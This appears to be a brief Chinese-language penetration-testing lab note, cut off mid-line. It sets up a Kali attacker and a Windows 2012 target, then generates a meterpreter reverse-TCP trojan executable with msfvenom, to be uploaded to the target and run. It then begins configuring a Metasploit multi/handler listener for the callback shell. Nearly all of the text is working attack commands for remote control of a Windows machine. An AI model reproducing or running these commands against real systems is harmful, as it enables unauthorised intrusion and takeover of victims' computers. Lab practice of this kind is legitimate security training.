实验环境
kali:192.168.98.168
win2012:192.168.98.167
生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.98.168(kali ip) LPORT=777 -f exe > shell.exe #生成的文件上传到目标机器并执行
设置监听
use exploit/multi/handler #创建监听
set payload windows/x64/meterpreter/reverse_tcp
set